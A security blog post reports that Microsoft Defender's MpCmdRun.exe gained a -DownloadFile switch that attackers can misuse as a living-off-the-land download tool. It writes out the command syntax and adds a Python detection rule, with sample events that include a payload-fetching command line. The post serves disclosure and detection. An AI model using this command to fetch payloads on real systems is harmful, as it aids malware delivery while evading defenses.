Security concerns about Microsoft Defender download feature

Microsoft has added a way to download arbitrary files with Defender. However, this download feature causes more headaches than enthusiasm among security experts.

I recently read about the new feature at deskmodder.de in the article Windows Defender (MpCmdRun.exe) als Download-Manager nutzen? Kein Problem. With the Defender update to version 4.18.2007.8-0 (source: Will Dormann), MpCmdRun.exe gained a new feature. Hacker mohammadaskar2 found it by accident and calls it the Microsoft Malware Protection Command Line. You can use the command:

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe  -DownloadFile -url <url> -path <local-path>

as an administrator to download any file with Windows Defender. Microsoft described this in a support article published in mid-August 2020. Colleague Lawrence Abrams points out on Bleeping Computer that this is a nice feature for malware writers: it is yet another case where a legitimate operating system file can be misused for malicious purposes.

Such binaries are called living-off-the-land binaries, or LOLBINs. Abrams writes that the feature was introduced with the update to version 4.18.2007.9 or 4.18.2009.9. BleepingComputer was able to download resources.exe, the WastedLocker ransomware sample used in a recent Garmin attack.
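Because MpCmdRun.exe is a signed Microsoft binary, the defender's lever is not blocking the file but watching how it is launched. The following is an added example (not code from the blog post, from Microsoft or from Bleeping Computer) that runs a simple detection rule over constructed process-creation events in the shape of Sysmon Event ID 1: it flags MpCmdRun.exe invocations carrying the -DownloadFile switch, pulls out the -url and -path arguments for the analyst, and rates the hit higher when the parent is an interactive shell or Office process rather than a service host. The field names, the sample events and the parent-process list are assumptions to be tuned to your own logging pipeline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample events shaped like Sysmon Event ID 1 (process creation)
# records. They are illustrative only, not logs from the blog post or any incident.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {   # An interactive shell driving MpCmdRun.exe to fetch a file: the LOLBIN case
        "EventID": 1,
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
        "CommandLine": r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url https://example.invalid/payload.bin -path "C:\Users\Public\payload.bin"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": r"CORP\jdoe",
    },
    {   # Routine signature update launched by the Defender service: benign, no download switch
        "EventID": 1,
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
        "CommandLine": r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -SignatureUpdate',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # Download switch (lower-case variant) with a service-host parent: report at lower confidence
        "EventID": 1,
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe",
        "CommandLine": r'"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -downloadfile -url https://example.invalid/update.cab -path C:\Temp\update.cab',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # A different binary altogether: outside the scope of this rule
        "EventID": 1,
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": "curl.exe -o C:\\Temp\\x.txt https://example.invalid/x.txt",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "User": r"CORP\jdoe",
    },
]


@dataclass
class Finding:
    user: str
    parent: str
    url: Optional[str]
    path: Optional[str]
    severity: str


# Parents from which Defender's download switch is not expected (assumed list; tune per environment).
USER_LAUNCHED_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                         "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}

# Matched case-insensitively so a case variant of the switch in the command line is not missed.
SWITCH_RE = re.compile(r"(?:^|\s)-downloadfile(?:\s|$)", re.IGNORECASE)
URL_RE = re.compile(r'(?:^|\s)-url\s+("[^"]*"|\S+)', re.IGNORECASE)
PATH_RE = re.compile(r'(?:^|\s)-path\s+("[^"]*"|\S+)', re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _arg(rx: "re.Pattern[str]", cmd: str) -> Optional[str]:
    """Return the (unquoted) value following a switch, or None if absent."""
    m = rx.search(cmd)
    return m.group(1).strip('"') if m else None


def analyze(event: Dict[str, object]) -> Optional[Finding]:
    """Return a Finding if the event is MpCmdRun.exe launched with -DownloadFile, else None."""
    if event.get("EventID") != 1 or basename(str(event.get("Image", ""))) != "mpcmdrun.exe":
        return None
    cmd = str(event.get("CommandLine", ""))
    if not SWITCH_RE.search(cmd):
        return None
    parent = basename(str(event.get("ParentImage", "")))
    # A user-driven shell or Office app asking Defender to download is the suspicious pattern;
    # a service-host parent still gets reported, but at lower confidence.
    severity = "high" if parent in USER_LAUNCHED_PARENTS else "medium"
    return Finding(user=str(event.get("User", "")), parent=parent,
                   url=_arg(URL_RE, cmd), path=_arg(PATH_RE, cmd), severity=severity)


def detect(events: List[Dict[str, object]]) -> List[Finding]:
    """Run the rule over a batch of events and keep only the hits."""
    return [f for f in (analyze(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.user} via {f.parent}: MpCmdRun.exe -DownloadFile {f.url} -> {f.path}")
```

On the constructed sample the rule reports two hits: the cmd.exe-launched download as high and the svchost.exe-launched one as medium, while the signature update and the curl invocation are left alone. Keying on the image name rather than the versioned Platform directory keeps the rule stable across the Defender platform updates the post mentions.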

Let's hope that Microsoft Defender will detect all malicious files downloaded with MpCmdRun.exe. The problem that other antivirus software disables Defender and is then blind to this attack should slowly be defused, since Microsoft is trying to prevent Defender from being disabled in Windows (see Microsoft Defender can no longer be disabled under Windows 10). The case shows once again that such nice features can have their Achilles heel.
